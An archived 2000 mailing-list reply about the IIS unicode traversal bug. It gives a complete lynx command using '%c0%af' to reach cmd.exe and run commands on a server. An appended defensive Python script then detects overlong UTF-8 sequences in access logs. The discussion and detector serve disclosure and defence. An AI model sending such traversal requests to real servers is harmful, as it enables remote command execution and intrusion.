Vulnerability Development mailing list archives
Re: IIS and unicode
From: "Robert A. Seace" <ras () SLARTIBARTFAST MAGRATHEA COM>
Date: Wed, 25 Oct 2000 10:49:57 -0400
In the profound words of aliver vilereal:
> ok, is it true that the unicode exploit only works under foreign machines that use 2-byte characters? if so, how can i check (in a http response) if this is a vulnerable system. i have heard that english systems are also vulnerable, but require a different string to be passed to them, is this true?
No, it's NOT just foreign versions... I tested an NT machine we have at work (standard US/English NT/IIS install; I'm not sure about versions/patchlevels; I'm not an MS guy, at all), and I was easily able to run arbitrary commands on it... The only char sequence I tried was "%c0%af"... I'm not sure if others might work, as well... Specifically, this worked perfectly (done from a Unix box, of course):

lynx -dump 'http://NTServerNameHere/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\'

Also, replacing "msadc" with "scripts" or "cgi-bin" works just as well... (Seemingly any valid, accessible subdir off the web root? *shrug*)

--
||========================================================================||
|| Rob Seace     || URL                            || ras () magrathea com ||
|| AKA: Agrajag  || http://www.magrathea.com/~ras/ || rob () wordstock com ||
||========================================================================||
"The secret of healthy hitchhiking is to eat junk food." - TRATEOTU
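Added example, not part of the original post: a log check for the "%c0%af" sequence mentioned above, which is an overlong two-byte UTF-8 encoding of "/" (0x2F). It generalizes to any overlong 2-, 3- or 4-byte form; the log lines and the function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample access-log lines (addresses and paths are made up).
SAMPLE_LOG = [
    '10.0.0.5 - - [25/Oct/2000:10:49:57 -0400] "GET /index.html HTTP/1.0" 200 1043',
    '10.0.0.9 - - [25/Oct/2000:10:50:02 -0400] "GET /msadc/..%c0%af../winnt/ HTTP/1.0" 200 512',
    '10.0.0.7 - - [25/Oct/2000:10:51:10 -0400] "GET /caf%c3%a9/menu.html HTTP/1.0" 200 2210',
]

# Smallest code point that legitimately needs an n-byte UTF-8 sequence.
MIN_CP = {2: 0x80, 3: 0x800, 4: 0x10000}
REQUEST = re.compile(r'"(?:GET|HEAD|POST) (\S+)')


def find_overlong(data: bytes):
    """Return (offset, hex bytes, aliased character) per overlong sequence."""
    hits, i = [], 0
    while i < len(data):
        lead = data[i]
        n = (2 if lead & 0xE0 == 0xC0 else 3 if lead & 0xF0 == 0xE0
             else 4 if lead & 0xF8 == 0xF0 else 1)
        tail = data[i + 1:i + n]
        if n > 1 and len(tail) == n - 1 and all(t & 0xC0 == 0x80 for t in tail):
            cp = lead & (0xFF >> (n + 1))      # payload bits of the lead byte
            for t in tail:
                cp = (cp << 6) | (t & 0x3F)    # six payload bits per continuation
            if cp < MIN_CP[n]:                 # shorter form exists: overlong
                hits.append((i, data[i:i + n].hex(), chr(cp)))
            i += n
        else:
            i += 1
    return hits


def scan(lines):
    """Return (line number, hex bytes, aliased character) for each finding."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        # Percent-decode once, as bytes, so no UTF-8 decoder hides the raw form.
        raw = unquote_to_bytes(m.group(1))
        findings += [(lineno, h, c) for _, h, c in find_overlong(raw)]
    return findings


if __name__ == "__main__":
    for lineno, hexseq, alias in scan(SAMPLE_LOG):
        print(f"line {lineno}: overlong {hexseq} aliases {alias!r}")
```

The legitimately encoded "%c3%a9" in the third sample line is not flagged, because its code point needs two bytes.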